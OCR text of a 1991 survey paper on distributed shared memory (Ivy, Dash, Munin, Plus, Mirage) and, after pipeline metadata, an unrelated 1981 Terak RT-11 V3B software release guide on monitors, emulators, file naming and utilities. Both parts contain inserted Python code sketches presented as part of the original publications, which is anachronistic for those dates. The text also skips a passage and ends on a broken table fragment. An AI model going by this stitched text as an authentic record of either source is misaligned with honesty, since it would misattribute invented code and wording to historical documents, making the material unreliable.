Scalability. A theoretical benefit of DSM systems is that they scale better than tightly coupled shared-memory multiprocessors. The scalability of DSM systems is limited mainly by two factors: central bottlenecks (such as the bus of a tightly coupled shared-memory multiprocessor), and global common knowledge operations and storage (such as broadcast messages or full directories, whose sizes are proportional to the number of nodes). Li and Hudak went through several iterations to refine a coherence protocol for Ivy before arriving at their dynamic distributed-manager algorithm, which avoids centralized bottlenecks. However, Ivy and most other DSM systems are currently implemented on top of Ethernet (itself a centralized bottleneck), which can support only about 100 nodes at a time. This limitation is a result of these systems being research tools rather than an indication of any real design flaw. Shiva is an implementation of DSM on an Intel iPSC/2 hypercube, and it should scale nicely. Nodes in the Dash system are connected to two meshes. This implies that the machine should be expandable, but the Dash prototype is currently limited by its use of a full bit vector (one bit per node) to keep track of page replication.

Heterogeneity. At first glance, sharing memory between two machines with different architectures seems almost impossible. The machines may not even use the same representation for basic data types (integers, floating-point numbers, and so on). It is a bit easier if the DSM system is structured as variables or objects in the source language. Then a DSM compiler can add conversion routines to all accesses to shared memory. In the Agora DSM system, memory is structured as objects shared among heterogeneous machines. Mermaid explores another novel approach: Memory is shared in pages, and a page can contain only one type of data. Whenever a page is moved between two architecturally different systems, a conversion routine converts the data in the page to the appropriate format. Although heterogeneous DSM might allow more machines to participate in a computation, the overhead of conversion seems to outweigh the benefits.

Implementation

A DSM system must automatically transform shared-memory access into interprocess communication. This requires algorithms to locate and access shared data, maintain coherence, and replace data. A DSM system may also have additional schemes to improve performance. Such algorithms directly support DSM. In addition, DSM implementers must tailor operating system algorithms to support process synchronization and memory management. We focus on the algorithms used in Ivy, Dash, Munin, Plus, Mirage, and Memnet because these systems illustrate most of the important implementation issues. Stumm and Zhou give a good evolutionary overview of algorithms that support static, migratory, and replicated data.

Data location and access.
To share data in a DSM system, a program must be able to find and retrieve the data it needs. If data does not move around in the system — it resides only in a single location — then locating it is easy. All processes simply "know" where to obtain any piece of data. Some Linda implementations use hashing on the tuples to distribute data statically. This has the advantages of being simple and fast, but may cause a bottleneck if data is not distributed properly (for example, all shared data ends up on a single node). An alternative is to allow data to migrate freely throughout the system. This allows data to be redistributed dynamically to where it is being used. However, locating data then becomes more difficult. In this case, the simplest way to locate data is to have a centralized server that keeps track of all shared data. The centralized method suffers from two drawbacks: The server serializes location queries, reducing parallelism, and the server may become a single point of failure. Instead of using a centralized server, a system can broadcast requests for data. Unfortunately, broadcasting does not scale well. All nodes — not just the nodes containing the data — must process a broadcast request. The network latency of a broadcast may also require accesses to take a long time to complete. To avoid broadcasts and distribute the load more evenly, several systems use an owner-based distributed scheme. This scheme is independent of data replication, but is seen mostly in systems that support both data migration and replication. Each piece of data has an associated owner — a node with the primary copy of the data. The owners change as the data migrates through the system. When another node needs a copy of the data, it sends a request to the owner. If the owner still has the data, it returns the data. If the owner has given the data to some other node, it forwards the request to the new owner. The drawback with this scheme is that a request may be forwarded many times before reaching the current owner. In some cases, this is more wasteful than broadcasting. In Ivy, all nodes involved in forwarding a request (including the requester) are given the identity of the current owner. This collapsing of pointer chains helps reduce the forwarding overhead and delay. When it replicates data, a DSM system must keep track of the replicated copies. Dash uses a distributed directory-based scheme, implemented in hardware. The Dash directory for a given cluster (node) keeps track of the physical blocks in that cluster. Each block is represented by a directory entry that specifies whether the block is unshared (local copy only), shared remote, or shared dirty. If the block is shared remote, the directory entry also indicates the location of replicated copies of the block. If the block is shared dirty, the directory entry indicates the location of the single dirty copy. Only the special node known as the home cluster possesses the directory block entry. A node accesses nonlocal data for reading by sending a message to the home cluster. Ivy’s dynamic distributed scheme also supports replicated data. A ptable on each node contains for each page an entry that indicates the probable location for the referenced page. As described above, a node locates data by following the chain of probable owners. The copy-list scheme implemented by Plus uses a distributed linked list to keep track of replicated data. Memory references are mapped to the physically closest copy by the page map table. Coherence protocol. 
All DSM systems provide some form of memory coherence. If the shared data is not replicated, then enforcing memory coherence is trivial. The underlying network automatically serializes requests in the order they occur. A node handling shared data can merely perform each request as it is received. This method will ensure strict memory consistency — the strongest form of coherence. Unfortunately, serializing data access creates a bottleneck and makes impossible a major advantage of DSM: parallelism.

To increase parallelism, virtually all DSM systems replicate data. Thus, for example, multiple reads can be performed in parallel. However, replication complicates the coherence protocol. Two types of protocols — write-invalidate and write-update protocols — handle replication. In a write-invalidate protocol, there can be many copies of a read-only piece of data, but only one copy of a writable piece of data. The protocol is called write-invalidate because it invalidates all copies of a piece of data except one before a write can proceed. In a write-update scheme, however, a write updates all copies of a piece of data.

Most DSM systems have write-invalidate coherence protocols. All the protocols for these systems are similar. Each piece of data has a status tag that indicates whether the data is valid, whether it is shared, and whether it is read-only or writable. For a read, if the data is valid, it is returned immediately. If the data is not valid, a read request is sent to the location of a valid copy, and a copy of the data is returned. If the data was writable on another node, this read request will cause it to become read-only. The copy remains valid until an invalidate request is received. For a write, if the data is valid and writable, the request is satisfied immediately. If the data is not writable, the directory controller sends out an invalidate request, along with a request for a copy of the data if the local copy is not valid. When the invalidate completes, the data is valid locally and writable, and the original write request may complete.

Figure 3. Simplified Dash write-invalidate protocol: (a) Data is shared remote; (b) data is dirty remote (after events depicted in Figure 3a). (DC stands for directory controller.)

Figure 3 illustrates the Dash directory-based coherence protocol. The sequence of events and messages shown in Figure 3a occurs when the block to be written is in shared-remote state (multiple read-only copies on nodes A and B) just before the write. Figure 3b shows the events and messages that occur when the block to be written is in shared-dirty state (single dirty copy on node C) just before the write. In both cases, the initiator of the write sends a request to the home cluster, which uses the information in the directory to locate and transfer the data and to invalidate copies. Lenoski et al. give further details about the Dash coherence protocol and the methods they used to fine-tune the protocol for high performance.

Li and Hudak show that the write-invalidate protocol performs well for a variety of applications. In fact, they show superlinear speedups for a linear equation solver and a three-dimensional partial differential equation solver, resulting from the increased overall physical memory and cache sizes. Li and Hudak rejected use of a write-update protocol at the outset with the reasoning that network latency would make it inefficient. Subsequent research indicates that in the appropriate hardware environment write-update protocols can be implemented efficiently.
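The read and write rules just described can be condensed into a short sketch. This is a schematic illustration with an invented, centralized Directory class, not the actual Dash protocol, which distributes directory state across clusters and operates through explicit messages.

```python
# A schematic sketch of the generic write-invalidate logic described above,
# assuming a single directory that knows which nodes hold copies of a page and
# which node, if any, holds it writable. Names are illustrative only.

class Directory:
    def __init__(self):
        self.copies = {}   # page -> set of nodes holding a valid copy
        self.writer = {}   # page -> node holding the single writable copy, or None

    def read(self, node, page):
        # A read demotes any writable copy to read-only and adds a new sharer.
        if self.writer.get(page) is not None:
            self.writer[page] = None           # former writer keeps a read-only copy
        self.copies.setdefault(page, set()).add(node)

    def write(self, node, page):
        # A write invalidates every other copy before granting write access.
        for other in self.copies.get(page, set()) - {node}:
            self.invalidate(other, page)
        self.copies[page] = {node}
        self.writer[page] = node

    def invalidate(self, node, page):
        print(f"invalidate page {page} at node {node}")

d = Directory()
d.read("A", 7)
d.read("B", 7)    # two read-only sharers of page 7
d.write("C", 7)   # invalidates the copies at A and B; C becomes the writer
```

Write-update protocols take the opposite approach, propagating each new value to every copy instead of invalidating the copies.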
For example, Plus is a hardware implementation of DSM that uses a write-update protocol. Figure 4 traces the Plus write-update protocol, which begins all updates with the block's master node, then proceeds down the copy-list chain. The write operation is completed when the last node in the chain sends an acknowledgment message to the originator of the write request.

Munin uses type-specific memory coherence protocols tailored for different types of data. For example, Munin uses a write-update protocol to keep coherent data that is read more often than it is written (read-mostly data). Because an invalidation message is about the same size as an update message, an update costs no more than an invalidate. However, the overhead of making multiple read-only copies of the data item after each invalidate is avoided. An eager paging strategy supports the Munin producer-consumer memory type. Data, once written by the producer process, is transferred to the consumer process where it remains available until the consumer process is ready to use it. This reduces overhead since the consumer does not request data that is already available in its buffer.

Replacement strategy. In systems that allow data to migrate around the system, two problems arise when the available space for "caching" shared data fills up: Which data should be replaced to free space and where should it go? In choosing the data item to be replaced, a DSM system works almost like a cache. ... copy of an item when it is not needed elsewhere in the system. This method is simple to implement, but it wastes a lot of memory. An improvement is to have the node that wants to delete the item simply page it out onto disk. Although this does not waste any memory space, it is time consuming. Because it may be faster to transfer something over the network than to transfer it to disk, a better solution (used in Shiva) is to keep track of free memory in the system and to simply page the item out to a node with space available to it.

**Thrashing.** DSM systems are particularly prone to thrashing. For example, if two nodes compete for write access to a single data item, it may be transferred back and forth at such a high rate that no real work can get done (a Ping-Pong effect). Two systems, Munin and Mirage, attack this problem directly. Munin allows programmers to associate types with shared data: write-once, write-many, producer-consumer, private, migratory, result, read-mostly, synchronization, and general read/write. Shared data of different types get different coherence protocols. To avoid thrashing with two competing writers, a programmer could specify the type as write-many and the system would use a delayed write policy. (Munin does not guarantee strict consistency of memory in this case.) Tailoring the coherence algorithm to the shared-data usage patterns can greatly reduce thrashing. However, Munin requires programmers to specify the type of shared data. Programmers are notoriously bad at predicting the behavior of their programs, so this method may not be any better than choosing a particular protocol. In addition, because the type remains static once specified, Munin cannot dynamically adjust to an application's changing behavior.

**Mirage** uses another method to reduce thrashing. It specifically examines the case when many nodes compete for access to the same page. To stop the Ping-Pong effect, Mirage adds a dynamically tunable parameter to the coherence protocol.
This parameter determines the minimum amount of time (Δ) a page will be available at a node. For example, if a node performed a write to a shared page, the page would be writable on that node for Δ time. This solves the problem of having a page stolen away after only a single request on a node has been satisfied. Because Δ is tuned dynamically on the basis of access patterns, a process can complete a write run (or read run) before losing access to the page. Thus, Δ is akin to a time slice in a multitasking operating system, except in Mirage it is dynamically adjusted to meet an application's specific needs.

**Related algorithms.** To support a DSM system, synchronization operations and memory management must be specially tuned. Semaphores, for example, are typically implemented on shared-memory systems by using spin locks. In a DSM system, a spin lock can easily cause thrashing, because multiple nodes may heavily access shared data. For better performance, some systems provide specialized synchronization primitives along with DSM. Clouds provides semaphore operations by grouping semaphores into centrally managed segments. Munin supports the synchronization memory type with distributed locks. Plus supplies a variety of synchronization instructions and supports delayed execution, in which the synchronization can be initiated and then later checked for successful completion. Dubois, Scheurich, and Briggs discuss the relationship between coherence and synchronization.

**Memory management can be restructured for DSM.** A typical memory-allocation scheme (as in the C library malloc()) allocates memory out of a common pool, which is searched each time a request is made. A linear search of all shared memory can be expensive. A better approach is to partition available memory into private buffers on each node and allocate memory from the global buffer space only when the private buffer is empty.

Research has shown distributed shared memory systems to be viable. The systems described in this article demonstrate that DSM can be implemented in a variety of hardware and software environments: commercial workstations with native operating systems software, innovative customized hardware, and even heterogeneous systems. Many of the design choices and algorithms needed to implement DSM are well understood and integrated with related areas of computer science. The performance of DSM is greatly affected by memory-access patterns and replication of shared data. Hardware implementations have yielded enormous reductions in communication latency and the advantages of a smaller unit of sharing.

However, the performance results to date are preliminary. Most systems are experimental or prototypes consisting of only a few nodes. In addition, because of the dearth of test programs, most studies are based on a small group of applications or a synthetic workload. Nevertheless, research has proved that DSM effectively supports parallel processing, and it promises to be a fruitful and exciting area of research for the coming decade.

**Acknowledgments**

This work was supported in part by NSF grant CCR-8808532, a Tektronix research fellowship, and the NSF Research Experiences for Undergraduates program. We appreciate the comments from the anonymous referees and thank the authors who verified information about their systems. Thanks also to Kurt Windisch for helping prepare this manuscript.
**References**

Bill Nitzberg is a PhD student in the Department of Computer and Information Science at the University of Oregon. In the AT&T-sponsored ACM International Programming Contest, Nitzberg was a member of the 1990 team and coached the 1991 team, which placed eighth and sixth, respectively. Nitzberg received a BS in mathematics and an MS in computer science, both from the University of Oregon. He is a member of ACM.

Virginia Lo is an assistant professor in the Department of Computer and Information Science at the University of Oregon. Her research interests include distributed operating systems and the mapping of parallel algorithms to parallel architectures. Lo received a BA from the University of Michigan, an MS in computer science from Pennsylvania State University, and a PhD in computer science from the University of Illinois at Urbana-Champaign. She is a member of the IEEE, the IEEE Computer Society, and the ACM.

Readers can reach the authors at the Department of Computer Science, University of Oregon, Eugene, OR 97403; e-mail [last name]@cs.uoregon.edu.
{"Source-Url": "https://www.cse.unsw.edu.au/~cs9243/17s1/papers/nitzberg91:.dsm.pdf", "len_cl100k_base": 7062, "olmocr-version": "0.1.50", "pdf-total-pages": 9, "total-fallback-pages": 0, "total-input-tokens": 10305, "total-output-tokens": 7981, "length": "2e12", "weborganizer": {"__label__adult": 0.0004506111145019531, "__label__art_design": 0.0006270408630371094, "__label__crime_law": 0.00042128562927246094, "__label__education_jobs": 0.0009713172912597656, "__label__entertainment": 0.000125885009765625, "__label__fashion_beauty": 0.00023925304412841797, "__label__finance_business": 0.000362396240234375, "__label__food_dining": 0.0004634857177734375, "__label__games": 0.0008082389831542969, "__label__hardware": 0.012451171875, "__label__health": 0.0008196830749511719, "__label__history": 0.0005340576171875, "__label__home_hobbies": 0.00020503997802734375, "__label__industrial": 0.0010528564453125, "__label__literature": 0.00032067298889160156, "__label__politics": 0.00032401084899902344, "__label__religion": 0.0007996559143066406, "__label__science_tech": 0.376220703125, "__label__social_life": 7.802248001098633e-05, "__label__software": 0.011444091796875, "__label__software_dev": 0.58935546875, "__label__sports_fitness": 0.000438690185546875, "__label__transportation": 0.0011644363403320312, "__label__travel": 0.0002815723419189453}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 35680, 0.02393]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 35680, 0.59154]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 35680, 0.8995]], "google_gemma-3-12b-it_contains_pii": [[0, 2520, false], [2520, 7278, null], [7278, 10372, null], [10372, 14513, null], [14513, 21191, null], [21191, 23289, null], [23289, 26009, null], [26009, 32474, null], [32474, 35680, null]], "google_gemma-3-12b-it_is_public_document": [[0, 2520, true], [2520, 7278, null], [7278, 10372, null], [10372, 14513, null], [14513, 21191, null], [21191, 23289, null], [23289, 26009, null], [26009, 32474, null], [32474, 35680, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, true], [5000, 35680, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 35680, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 35680, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 35680, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 35680, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 35680, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 35680, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 35680, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 35680, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 35680, null]], "pdf_page_numbers": [[0, 2520, 1], [2520, 7278, 2], [7278, 10372, 3], [10372, 14513, 4], [14513, 21191, 5], [21191, 23289, 6], [23289, 26009, 7], [26009, 32474, 8], [32474, 35680, 9]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 35680, 0.05699]]}
olmocr_science_pdfs
2024-11-30
2024-11-30
a76730b1a408386d8131fd3d425913c0e975e4d8
TERAK CORPORATION believes that the information contained herein is accurate. In no event will TERAK be liable for any losses or damages whether direct or indirect resulting from the use of such information, including, without limitation, losses arising from claims of patent, copyright, and trademark infringement. No license is granted hereby for the use of any patent or patent rights of TERAK. TERAK reserves the right to update the information contained herein at any time without further notice. The information contained herein is proprietary to TERAK CORPORATION and must be treated as confidential. It may not be disclosed to others or be used for any purpose without the written consent of TERAK CORPORATION.

SOFTWARE RELEASE GUIDE

TERAK-85/RT-11, VERSION 3B, OPERATING SYSTEM for the TERAK 8510/a BLACK & WHITE GRAPHICS COMPUTER SYSTEM

Document No. 60-0079-001 Rev. A

Copyright 1981 TERAK CORPORATION "All Rights Reserved"

TERAK is a trademark of TERAK CORPORATION. DEC, PDP-11, RT-11 and LSI-11 are trademarks of DIGITAL EQUIPMENT CORPORATION. BASIC is a registered trademark of the Trustees of Dartmouth College. IBM is a trademark of International Business Machines Corporation.

Release Date: May, 1981

4. SYSTEM CHARACTERISTICS

Before you can begin building a working disk you must determine the system characteristics best suited to your application. This section provides the background information you need to build your working system. Included are discussions of the monitor capabilities, device handlers, and screen console characteristics available with your RT-11 software. In addition, file and monitor naming conventions are reviewed.

4.1 MONITOR CHARACTERISTICS

The monitor you choose provides the core around which you will build your working system. There are three primary types of monitor provided with your RT-11 software: the Base-line Single Job Monitor, the Standard Single-Job Monitor and the Foreground/Background Monitor.

The Base-line Single Job Monitor is a special version of the single job monitor. It has the smallest memory requirement of the monitors provided and is intended for use in applications where the greatest amount of memory possible must be made available for the user's program. The base-line monitor can perform all of the system commands and run most of the utilities. For highly interactive applications, the standard single job monitor should be used. The more complete device support and error processing of the single-job monitor will provide a more flexible and easy-to-use system.

The Single Job Monitor is the smallest standard RT-11 monitor. It will run all the system utilities and support all hardware devices. The single job monitor has the fastest response times, at interrupt and keyboard level, of the standard monitors provided. If your application involves continuous execution of a single user program, interactive program development, or maximum-throughput real-time data acquisition, the single job monitor will be the best choice.

The Foreground/Background Monitor is the RT-11 monitor that supports multi-programming. The foreground/background monitor lets you operate an independent foreground job, at a higher software priority level than the background, while you use the remaining system facilities to support the background job. The foreground job is not intended for use as a two-user time-sharing system or for interactive program development.
Rather, it best supports a stable, event-driven I/O or realtime job that can execute with a minimum of user interaction while the background deals with the balance of the system requirements. If you have a real-time, software priority application which you need to run concurrently with normal system development and data-processing applications, the foreground/background monitor is the proper choice. If you do not require concurrent execution, use of the single job monitor will conserve system resources.

4.2 CONSOLE DISPLAY CHARACTERISTICS

The console display is provided through a software terminal emulator. Software (the Emulator) controls all console functions, including motions of the cursor, character panning or echo, and scrolling of the screen. The emulator code is resident within the operating system and may be activated by all the standard system terminal procedure calls. The screen may also be driven by user program I/O routines which expect to drive a serial interface at the standard console addresses. The emulators released in this kit are a glass teletype (GT) and the Terak emulator (TK). Other terminals can be emulated but are not provided with this software kit.

The emulator accepts characters from the hardware emulator data buffer and places them into the page buffer in a manner similar to a hardware data terminal. The characters are placed into the hardware emulator data buffer by the TT handler which is built into the RT-11 V3B monitors. RT-11, and other code which drives a serial interface, will operate without modification, provided that the code runs at processor level 0 (all interrupts enabled). Note that MICRO-ODT does not meet this requirement. The GT emulator is used most often when memory space precludes use of the TK emulator, or when a simple terminal is all that is required for a particular application.

4.3 DEVICE HANDLERS

The Terak RT-11 monitors are generated with the standard DEC RT-11 device handlers, plus system (QX and QB), console (TT), and Null (NL) device handlers. Three (or five) free I/O slots are included for additional devices in the single job and foreground/background monitors. The base-line monitor contains neither a null device handler nor free handler slots. The user may add additional device handlers using the INSTALL command as described in the RT-11 V3B System User's Guide.

Summary of Monitor Characteristics

<table> <thead> <tr> <th></th> <th>BL</th> <th>SJ</th> <th>FB</th> </tr> </thead> <tbody> <tr> <td>Memory Support Required</td> <td>8-28k-words</td> <td>8-28k-words</td> <td>16-28k-words</td> </tr> <tr> <td>Support FG Job</td> <td>no</td> <td>no</td> <td>yes</td> </tr> <tr> <td>Timer Facilities</td> <td>no</td> <td>yes</td> <td>yes</td> </tr> <tr> <td>BATCH Support</td> <td>no</td> <td>optional</td> <td>optional</td> </tr> <tr> <td>Graphics Terminal Support</td> <td>yes</td> <td>yes</td> <td>yes</td> </tr> <tr> <td>Devices Supported</td> <td>QB,QX,GT</td> <td>QB,QX,GT,NL,TK</td> <td>QB,QX,GT,NL,TK</td> </tr> <tr> <td></td> <td>No free I/O slots</td> <td>3 free I/O slots</td> <td>5 free I/O slots</td> </tr> </tbody> </table>

4.4 TERAK MONITOR CONFIGURATIONS

Terak monitors are shipped with either a Terak emulator or a Glass Teletype emulator resident within the monitor.
The monitor/emulator combinations shipped are:

- Base-line/Glass Teletype
- Single-Job/Glass Teletype
- Single-Job/Terak
- Foreground/background/Glass Teletype
- Foreground/background/Terak

Each of the monitors also has bootstraps for specific device handlers embedded within the monitor. The device handler specified within the bootstrap may be QX single drive, QX multidrive or QB multidrive. The QB single drive option is resident as a set utility within the QB multidrive monitor.

4.5 MONITOR AND HANDLER FILE EXTENSIONS

The RT-11 monitor and handler file extensions follow a standard naming convention. This convention is important to the system at bootstrap time, when the system bootstrap uses a file name search to determine which monitor file to boot and which handler files (and therefore which devices) are present on the system. RT-11 monitor file names are always of the following format:

```
xxMNyy.SYS
```

Here xx identifies the device handler, yy identifies the monitor type, and the .SYS extension identifies the file as the system monitor. The first two letters (xx) are a two-character device code which identifies this monitor's system device. The Terak system device will be either QB for the QB series device handler or QX for the QX series handler. The last two letters (yy) identify the type of monitor resident in the file: BL for base-line, SJ for single-job and FB for foreground/background. The middle two letters of any monitor file name are always MN, and the file type of the system monitor file is always .SYS. Therefore,

```
QBMNSJ.SYS
```

indicates that this file is the system monitor file, that it is a single job monitor and the system device is a QB handler. NOTE that you can identify the monitor code extension, which appears as part of the operating system logo, when you boot the system or by checking the disk directory to see which of the monitors present has the .SYS extension.

4.6 MONITOR AND HANDLER NAMING CONVENTIONS

When you load a monitor into memory and boot the system, the monitor will return by printing an identifying message on the screen:

```
RT-11 V03B-00D-Axx
```

This indicates that the system is RT-11, the version is 3B, any revisions (00D-A) and the monitor code extension (xxx). The monitor code extension tells you which monitor is currently resident within your operating system. All Terak MONITOR CODE EXTENSIONS follow a standard naming convention. The first letter indicates the type of monitor: base-line (B), single-job (S) or foreground/background (F). The middle letter identifies the emulator characteristics resident within the monitor: glass teletype (G) or Terak (T). The final letter indicates whether the monitor is intended for use on a single drive (S) or a multidrive system (M).
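The naming rules above are mechanical enough to decode automatically. The following sketch simply restates the mappings given in sections 4.5 and 4.6; the function names are illustrative and not part of the released software.

```python
# A small sketch that decodes the naming conventions described above.
# The letter-to-meaning mappings come straight from the text; the function
# names and output wording are our own.

DEVICE = {"QB": "QB-series system device", "QX": "QX-series system device"}
MONITOR = {"BL": "base-line", "SJ": "single-job", "FB": "foreground/background"}
JOB = {"B": "base-line", "S": "single-job", "F": "foreground/background"}
EMULATOR = {"G": "glass teletype", "T": "Terak"}
DRIVES = {"S": "single drive", "M": "multidrive"}

def decode_monitor_file(name: str) -> str:
    """Decode a monitor file name of the form xxMNyy.SYS."""
    base, ext = name.upper().split(".")
    assert ext == "SYS" and base[2:4] == "MN", "not a monitor file name"
    return f"{MONITOR[base[4:6]]} monitor, {DEVICE[base[0:2]]}"

def decode_code_extension(code: str) -> str:
    """Decode a three-letter monitor code extension such as SGS."""
    job, emu, drv = code.upper()
    return f"{JOB[job]} monitor, {EMULATOR[emu]} emulator, {DRIVES[drv]}"

print(decode_monitor_file("QBMNSJ.SYS"))  # single-job monitor, QB-series system device
print(decode_code_extension("SGS"))       # single-job monitor, glass teletype emulator, single drive
```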
The Terak monitors, their code extensions and characteristics are listed below. Each three-letter code extension is read as:

- Type of job: B, S, or F
- Emulator: G or T
- Single drive (S) or multidrive (M)

#### Monitor Characteristics

<table> <thead> <tr> <th>Code Extension</th> <th>Size in blocks</th> <th>Handler</th> <th>User Space (K words)</th> </tr> </thead> <tbody> <tr> <td>BTM</td> <td>63</td> <td>3</td> <td>25.8</td> </tr> <tr> <td>BGM</td> <td>60</td> <td>3</td> <td>26.3</td> </tr> <tr> <td>STM</td> <td>64</td> <td>3</td> <td>25.5</td> </tr> <tr> <td>SGM</td> <td>62</td> <td>3</td> <td>25.9</td> </tr> <tr> <td>FTM</td> <td>73</td> <td>5</td> <td>23.6</td> </tr> <tr> <td>FGM</td> <td>71</td> <td>5</td> <td>24.1</td> </tr> <tr> <td>BGS</td> <td>64</td> <td>3</td> <td>25.8</td> </tr> <tr> <td>BTS</td> <td>63</td> <td>3</td> <td>26.3</td> </tr> <tr> <td>STS</td> <td>64</td> <td>3</td> <td>25.5</td> </tr> <tr> <td>SGS</td> <td>62</td> <td>3</td> <td>25.9</td> </tr> <tr> <td>FTS</td> <td>73</td> <td>5</td> <td>23.6</td> </tr> <tr> <td>FGS</td> <td>71</td> <td>5</td> <td>24.1</td> </tr> </tbody> </table>

### 4.7 CHARACTER SETS

Your RT-11 software contains several character sets. In addition to the standard English character set, foreign language character sets for Greek, Arabic and Russian are available. Several special function sets for science, mathematics and form generation are also included. Character sets have the file extension `.CHR` and must be initialized by the system software. The character set is fetched from a system file, CHRSET.SYS. If the system has been turned off, the system file CHRSET.SYS must be present on the disk used to boot the system. You may select any character set by renaming it CHRSET.SYS.

A character set file contains a packed image of either 96 or 192 character templates. Each template is a 10-byte field representing a character as 10 rows of eight pixels, top row first, with the leftmost pixel corresponding to the least significant bit of the byte. The two half character sets are packed arrays of 96 character templates, covering character codes 40 (octal) thru 177, or codes 240 thru 377. In a character set file, the second half character set starts on a logical block boundary. Thus, it is possible to split a character set in half by file surgery using DUP or PIP. Character set files are either two or four blocks long. The default extension for a character set file is `.CHR`.

During bootstrap the character set file is loaded into the writeable character generator of the Terak 8510/a. If CHRSET.SYS contains half a character set, the upper half set will be generated from the video reverse of the lower half set. A half character set, 96 characters only, is indicated by a file of only two blocks size. If CHRSET.SYS does not contain half a character set, the entire 192-character set will be loaded from the contents of the full four-block file. If CHRSET.SYS is absent when the system is booted, the bootstrap will proceed. If the power has not been cycled since the last character set load, the previous character set will still be present. If the disk does not have a character set file (no CHRSET.SYS) and the power has been cycled, the system will function normally but random character fonts will be displayed. In this case the utility CSLOAD is available for reloading a character set file.
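Given the template layout just described, a character set file can be inspected on any host with a short program. The sketch below follows the stated layout (10 bytes per template, top row first, least significant bit on the left); the file name and helper names are hypothetical, and this is not one of the released Terak utilities.

```python
# A sketch of how one could examine a character-set (.CHR) file from the host
# side, assuming the layout described above: 10 bytes per template, one byte
# per row (top row first), least significant bit = leftmost pixel, and the
# lower half set starting at character code 40 octal.

def render_template(data: bytes, char: str, base_code: int = 0o40) -> str:
    """Return a 10-row ASCII rendering of one character template."""
    index = ord(char) - base_code
    rows = data[index * 10:(index + 1) * 10]
    lines = []
    for row in rows:
        # Bit 0 is the leftmost pixel, so test bits from the LSB upward.
        lines.append("".join("#" if row & (1 << bit) else "." for bit in range(8)))
    return "\n".join(lines)

with open("CHRSET.SYS", "rb") as f:   # hypothetical path to a character set file
    data = f.read()

print(render_template(data, "A"))
```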
5.7 THE LIBRARIAN (LIBR)

The librarian utility lets you create, update, modify, list, and maintain object library files. You can also create MACRO library files for use with the MACRO assembler.

5.8 THE LINKER (LINK)

The Linker converts object modules produced by the language translator to a format suitable for loading and execution.

5.9 THE MACRO-11 PROGRAM ASSEMBLER (MACRO)

The MACRO-11 assembler program lets you assemble MACRO programs under the RT-11 operating system, provided those programs have been written using the rules listed in the PDP-11 MACRO-11 Language Reference Manual.

5.10 ON-LINE DEBUGGING TECHNIQUE (ODT)

ODT is the RT-11 on-line debugging utility which aids in debugging programs.

5.11 PASCAL/RT-11 FILE CONVERSION UTILITY (PAS2RT)

PAS2RT will display the directory of a Pascal structured disk and will transfer files to an RT-11 structured disk. Data may be transferred in either binary or text form. Text files (those that will be accessed by the Editor or used as source code for a compilation or assembly) should be copied in TEXT mode. This is necessary because of the source file format. Other types of files should be transferred in BINARY mode. PAS2RT has a command structure compatible with the corresponding utility RT2PAS, which transfers RT-11 structured files to Pascal structure. These two utilities provide transportability between RT-11 and Pascal systems.

With the RT-11 system disk in drive 0 and the Pascal disk in drive 1, call PAS2RT by typing:

```
R PAS2RT
```

<table> <thead> <tr> <th>Type</th> <th>The system will return</th> </tr> </thead> <tbody> <tr> <td>1. R PAS2RT</td> <td>Display Directory?</td> </tr> <tr> <td>2. Y</td> <td>Enter Source file title</td> </tr> <tr> <td>3. Enter Pascal file to be transferred</td> <td>Enter target file title</td> </tr> <tr> <td>4. Enter RT-11 file name you wish the file to be called</td> <td>Transfer mode: B)inary or T)ext</td> </tr> <tr> <td>5. Enter B or T</td> <td>PAS2RT will complete the file transfer.</td> </tr> </tbody> </table>

5.12 PATCH

The PATCH utility program lets you make code modifications to any RT-11 file. You can use PATCH to interrogate and then to change words or bytes in a file.

5.13 SOURCE COMPARE (SRCCOM)

SRCCOM compares two ASCII files and lists the differences between them. SRCCOM can print the results or store them in a file. (An illustrative example of this kind of comparison appears after the utility list below.)

5.14 TECO

TECO is a text editing program that runs under your RT-11 Operating System. TECO can be used to edit ASCII text including program listings, manuscripts, correspondence or other routine editing jobs. TECO is a character editor rather than a line editor and does not have line numbers associated with it. A single character can be changed without further modifying the line it resides in. Because of its versatility, TECO contains a sophisticated series of commands. The user should review the TECO User's Guide before attempting operation.

5.15 TEXT EDITOR (EDIT)

EDIT is a text editor utility used to create or modify ASCII source files for use as input to other system programs. Files may be input to the MACRO-11 assembler or the FORTRAN or BASIC compilers. EDIT can read ASCII files from any input device, modify them, and write to any output device.

In addition to the utilities listed in this section, the following special purpose utilities are available:

CROSS REFERENCE OPTION
DUMP
HELP
OBJECT MODULE PATCH UTILITY

Refer to the RT-11 User's Guide for a complete discussion of their function.
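For readers unfamiliar with source-compare utilities, the following sketch shows the kind of line-by-line difference listing a SRCCOM-style comparison produces. It uses Python's difflib and hypothetical file names; it illustrates the idea only and is not the RT-11 SRCCOM program.

```python
# A rough, host-side illustration of comparing two ASCII source files and
# listing their differences, in the spirit of SRCCOM. File names are hypothetical.
import difflib

def compare_files(old_path: str, new_path: str) -> str:
    with open(old_path) as f_old, open(new_path) as f_new:
        old_lines, new_lines = f_old.readlines(), f_new.readlines()
    diff = difflib.unified_diff(old_lines, new_lines, fromfile=old_path, tofile=new_path)
    return "".join(diff)

print(compare_files("PROG1.MAC", "PROG2.MAC"))   # print the differences between two sources
```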
<table>
<thead>
<tr><th>LOGICAL SENSE OF ERROR BIT</th><th>Default = Bit 15 On -&gt; Error; Set SP Logic, Set SP No Logic</th></tr>
